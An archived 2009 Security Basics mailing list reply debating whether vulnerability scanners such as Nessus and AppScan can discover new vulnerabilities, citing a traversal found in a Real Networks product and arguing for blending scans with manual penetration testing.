Security Basics mailing list archives

Re: Vulnerability scanners don't work


From: security curmudgeon <jericho () attrition org>
Date: Thu, 8 Jan 2009 20:49:48 +0000 (UTC)


: Good point, I don't think that I was as clear as I could have been.  
: The truth is that vulnerability scanners do contain signatures or 
: scripts that allow them to hunt for certain types of vulnerabilities as 
: well as the specific known vulnerabilities.  But are you saying that 
: they can actually identify new vulnerabilities? I'm still saying that 
: they can't.

Absolutely, and they have. In the last 12 months, I handled a disclosure 
between the pen-test shop I recently left and Real Networks for a 
vulnerability in one of their products. A consultant ran Nessus against a 
client and ended up finding a traversal that allowed him to grab any file 
on the remote system. Likewise with AppScan, I handled several disclosures 
to vendors for a wide variety of SQLi and XSS in various products.

I'm not saying that either product found vulnerabilities the consultant 
didn't or wouldn't have, but those tools were used on every network or 
application test to set a base line. In several cases, each found 
new vulnerabilities before the consultant began the manual testing.

I'm a little confused here on why you are so insistant on vulnerability 
scanners not being able to find a new vulnerability.

: Lets take your www_too_long_auth.nasl script into consideration only 
: because it is the first one that I noticed.  That script just connects 
: to a web service and blindly dumps a 2048 bit payload into the 
: authorization buffer. If the service stops responding then the script 
: tells the scanner that the service is vulnerable, but is it? If the 
: service keeps responding then the script tells the scanner that the 
: service is not vulnerable, how accurate is that? Would you consider that 
: to be positive vulnerability identification? Can we be certain that the 
: scripts are finding real, exploitable conditions and not false 
: positives?

How accurate? Pretty accurate that a long string may cause a DoS 
condition.

Positive vulnerability identification? Absolutely not.

Can we be certain..? Absolutely not.

I only stated that these products can find vulnerabilities, and don't 
necessarily require or only use signature based auditing. Just like a 
human doing a pen-test, the scanners have to find evidence of a 
vulnerability first. That may be in the form of a crash, error message or 
something else that catches their eye. Yes, vulnerability scanners are 
primitive compared to a good pen-tester, i'm not arguing that or trying to 
say that scanners can replace humans. I am saying that vulnerability 
scanners have their place in the market for many reasons, and that the 
important part is to understand how they work, what they can find and the 
limitations inherant in their design.

: Sure they might be able to identify a problem that might be a 
: vulnerability via the ad-hoc perl -e style testing, but in my opinion 
: thats not good enough. That is not a positive identification of a new 
: vulnerability.  That is the identification of a theoretical 
: vulnerability which isn't technically a real vulnerability until its 
: been proved by a human, right?

Sure, just like it is with a human tester. Many of whom cannot do the 
required follow-up either =) (be it time, resources, skillset, etc)

: So is this inaccurate, or just unclear:
: 
: "The fact is that vulnerability scanners can not detect vulnerabilities unless
: someone has first identified the vulnerability and created a signature for its
: detection."

Inaccurate. Vulnerability scanners that use general fuzzing or common 
exploit scenarios *can* find/detect vulnerabilities possibly. It is not 
reliable and should not be used to replace a pen-tester by any means.

: Perhaps I should write:
: 
: "The fact is that vulnerability scanners can not positively identify
: vulnerabilities."

Inaccurate. =) Jumping back to my example above, the vulnerability found 
in a Real product was positively identified by a scanner. It did a GET 
request to an RTSP enabled server and grabbed /etc/password due to a 
traversal vulnerability. The output of the vulnerability scanner made it 
very clear there was an issue there as it displayed the captured file.

What the scanner couldn't do, that the consultant did, was test that he 
could grab other files and then share that information with me so I could 
in turn share with the vendor.

: I think that "what's best" is a major part of the problem. Most people 
: don't know the difference between a vulnerability scan and a manual 
: vulnerability assessment.  Most people think that they are both the same 
: thing, same quality, etc. Thats an advantage for the vulnerability scan 
: vendor, but its a disadvantage to the people who don't know "what's 
: best".

Right, and this has been the battle you and many others have fought for 
over a decade now. Educating customers on what they really need when they 
come to you saying "test our systems" in so many words. If a pen-test shop 
has a good sales goon, that is the first hurdle they have to jump; 
identifying what the customer really needs, because 95% of the time they 
sure don't know.

: I'd like people to be able to make well informed decisions so that if 
: they use a vulnerability scanner they know what they are really getting. 
: The fact of the matter is that vulnerability scanners are an invaluable 
: tool with respect to maintaining the security of a network and doing 
: nightly checkups, but they are not nearly as accurate as the human 
: teams. As a result, we recommend to our customers they perform 
: vulnerability scans frequently and undergo intense manual penetration 
: testing once or twice a year.

Exactly. Most shops need a blended solution like this, and it is much more 
viable financially than the message "only use a pen-test shop for real 
testing" sends. Like I said, when a company has 100k machines across the 
org, vulnerability scanners certainly have their place.

: I might actually take consideration and write the article that you've 
: suggested.

You should, it definitely seems in line with previous posts about the 
quality of some pen-test teams. I'm sure you've been on an test that 
ended up finding many vulnerabilies, only to be told "what?! we had 
$company do a pen-test 3 months ago!"


Current thread: